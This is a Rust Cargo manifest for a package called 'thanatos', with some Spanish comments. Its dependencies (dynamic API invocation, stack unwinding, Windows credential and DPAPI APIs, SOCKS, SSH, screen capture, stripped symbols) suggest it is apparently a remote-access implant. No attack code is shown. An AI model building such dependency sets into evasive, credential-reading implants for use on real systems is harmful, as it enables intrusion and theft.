[workspace]
members = ["shared"]

[package]
name = "thanatos"
version = "0.1.14"
authors = ["Matt Ehrnschwender (@M_alphaaa)"]
edition = "2021"

[profile.release]
strip = "symbols"
opt-level = "s"


[features]
default = []

[dependencies]
# === Core serialization ===
serde = { version = "1.0", features = ["derive"] }
serde_json = "1.0"

# === Image / capture helpers ===
# Para convertir el bitmap a JPEG en memoria

# === SOCKS + base64 queue ===
base64 = "0.21.7"
once_cell = "1.19"

# === Cryptography & encoding ===
aes = "0.7"
block-modes = "0.8"
hmac = "0.11"
sha2 = "0.9"

# === Miscellaneous ===
cfg-if = "1.0.0"
chrono = "0.4"
path-clean = "0.1.0"
rand = "0.8"
netstat2 = "0.11.1"

# === Networking / HTTP ===
minreq = { version = "2.4", features = ["https-rustls-probe"] }

# === Async runtime ===
tokio = { version = "1.36", features = ["net", "rt-multi-thread", "io-util", "macros", "process", "sync", "time"] }

# === Native crypto / SSH ===
openssl = { version = "0.10", features = ["vendored"] }
ssh2 = { version = "0.9", features = ["vendored-openssl"] }


# === Platform-specific dependencies ===
[target.'cfg(target_os = "linux")'.dependencies]
libc = "0.2"

[target.'cfg(target_os = "windows")'.dependencies]
windows-acl = "0.1"
wmi = "0.9"
dinvoke_rs = "0.2.0"
unwinder = "0.1.4"

# winapi (scoped to windows target): añadidos los módulos que usamos en los ficheros
[target.'cfg(target_os = "windows")'.dependencies.winapi]
version = "0.3"
features = [
  "aclapi",
  "errhandlingapi",
  "fileapi",
  "handleapi",
  "heapapi",
  "libloaderapi",
  "impl-default",
  "memoryapi",
  "processthreadsapi",
  "securitybaseapi",
  "synchapi",
  "tlhelp32",
  "winbase",
  "wincon",
  "wincred",
  "wincrypt",
  "dpapi",
  "winnt",
  "winuser",
  "wow64apiset",
  "sysinfoapi",

  # módulos adicionales necesarios para GDI & utilidades usadas
  "wingdi",
  "combaseapi",
  "minwindef",
  "windef",
  "basetsd",
]
